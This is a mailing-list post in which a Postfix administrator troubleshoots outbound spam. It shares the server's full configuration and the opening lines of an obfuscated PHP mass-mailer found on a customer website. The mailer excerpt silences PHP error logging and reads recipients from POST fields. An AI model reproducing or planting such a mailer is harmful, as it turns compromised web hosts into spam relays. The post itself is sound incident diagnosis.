On Tue, October 8, 2013 11:31 am, Simon B wrote:
> On 8 Oct 2013 01:54, "Voytek" <li...@sbt.net.au> wrote:

> there is spam going out from many.na...@adomain.tld; what is the best way
> to block any outbound mail from adomain.tld until I can look into this?

> Postfix stop
>
>
> Then post your postconf -n and a log snippet of an outgoing spam message.

Simon, thanks

--------------------
# postconf -n
address_verify_sender = $double_bounce_sender
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
anvil_rate_time_unit = 1800s
body_checks = pcre:/etc/postfix/body_checks
body_checks_size_limit = 150000
broken_sasl_auth_clients = yes
command_directory = /usr/sbin
config_directory = /etc/postfix
content_filter = smtp-amavis:[127.0.0.1]:10024
daemon_directory = /usr/libexec/postfix
debug_peer_level = 2
disable_vrfy_command = yes
header_checks = pcre:/etc/postfix/header_checks
home_mailbox = Maildir/
html_directory = /usr/share/doc/postfix-2.4.5-documentation/html
local_recipient_maps = unix:passwd.byname $alias_maps
local_transport = local
mail_owner = postfix
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
message_size_limit = 15360000
mime_header_checks = pcre:$config_directory/mime_headers.pcre
mydestination = $myhostname, localhost.$mydomain
myhostname = server.tld
mynetworks = 111.222.333.444 222.333.444.555 127.0.0.1
myorigin = $mydomain
newaliases_path = /usr/bin/newaliases.postfix
queue_directory = /var/spool/postfix
readme_directory = /usr/share/doc/postfix-2.4.5-documentation/readme
recipient_bcc_maps = hash:/etc/postfix/bcc_r_maps
recipient_delimiter = +
sample_directory = /etc/postfix/samples
sender_bcc_maps = hash:/etc/postfix/bcc_s_maps
sendmail_path = /usr/sbin/sendmail.postfix
setgid_group = postdrop
smtp_tls_cert_file = $smtpd_tls_cert_file
smtp_tls_key_file = $smtpd_tls_key_file
smtp_tls_loglevel = 1
smtp_tls_note_starttls_offer = yes
smtp_tls_security_level = may
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtp_tls_session_cache_timeout = 3600s
smtpd_client_connection_rate_limit = 50
smtpd_data_restrictions = reject_unauth_pipelining, permit
smtpd_helo_required = yes
smtpd_helo_restrictions = permit_mynetworks,    permit_sasl_authenticated,
   check_helo_access ${RE}helo.re
smtpd_recipient_restrictions = permit_sasl_authenticated,
permit_mynetworks, reject_unauth_destination, check_recipient_access
hash:/etc/postfix/recipient_no_checks, reject_non_fqdn_sender,
reject_non_fqdn_recipient, reject_invalid_helo_hostname,
reject_non_fqdn_helo_hostname, reject_unknown_sender_domain,
reject_unknown_reverse_client_hostname, reject_unlisted_recipient,
check_sender_access hash:/etc/postfix/freemail_access,
check_recipient_access pcre:/etc/postfix/recipient_checks.pcre,
check_helo_access hash:/etc/postfix/helo_checks, check_sender_access
hash:/etc/postfix/sender_checks, check_client_access
hash:/etc/postfix/client_checks, check_client_access
pcre:/etc/postfix/client_checks.pcre, reject_rbl_client zen.spamhaus.org,
reject_rhsbl_client dbl.spamhaus.org, reject_rhsbl_sender
dbl.spamhaus.org, reject_rbl_client psbl.surriel.com, reject_rbl_client
bl.spamcop.net, reject_rhsbl_sender dsn.rfc-ignorant.org,
check_policy_service inet:127.0.0.1:10031, permit
smtpd_restriction_classes = from_freemail_host
smtpd_sasl_auth_enable = yes
smtpd_sasl_authenticated_header = yes
smtpd_sasl_local_domain =
smtpd_sasl_path = private/auth
smtpd_sasl_security_options = noanonymous
smtpd_sasl_type = dovecot
smtpd_tls_auth_only = yes
smtpd_tls_cert_file = /etc/pki/tls/certs/server.crt
smtpd_tls_key_file = /etc/pki/tls/certs/server.key
smtpd_tls_loglevel = 1
smtpd_tls_received_header = yes
smtpd_tls_security_level = may
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtpd_tls_session_cache_timeout = 36000s
strict_rfc821_envelopes = yes
tls_random_source = dev:/dev/urandom
transport_maps = hash:/etc/postfix/transport
unknown_local_recipient_reject_code = 550
virtual_alias_maps = proxy:mysql:/etc/postfix/mysql_virtual_alias_maps.cf
virtual_gid_maps = static:5000
virtual_mailbox_base = /var/mail/vhosts
virtual_mailbox_domains =
proxy:mysql:/etc/postfix/mysql_virtual_domains_maps.cf
virtual_mailbox_limit = $message_size_limit
virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql_virtual_mailbox_maps.cf
virtual_minimum_uid = 5000
virtual_transport = lmtp:unix:private/dovecot-lmtp
virtual_uid_maps = static:5000

--------------------

there is a PHP script on their web site like the one below (the first lines
of it). It silences PHP error reporting/logging and takes its parameters,
including the recipient addresses, from POST fields, so it looks like a
mailer dropped in via the web server rather than a mail account. At this
point I'm trying to work out how it was uploaded:

---------------------
 head  xmlrpcVZY.php
<?php
@error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL);
@ini_set('log_errors',0); if (count($_POST) < 2) {
die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false;
foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case
chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 =
$v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case
chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' ||
$v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321));
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
$v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38];
$v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 =
n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 =
n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203));
$v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 =
urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) !=
false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 =
count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; }
for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 =
$v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1))
continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b,
$vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203));
$va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc);
$v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' ||
$va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c;
} else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else {
$vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203);
$v3a5939e4 = next(explode('@', $v01b6e203)); }
preg_match('|<USER>(.*)</USER>|
snip
---------------------

(I wasn't able to include the above earlier, as I was on a 4" mobile screen — sorry.)


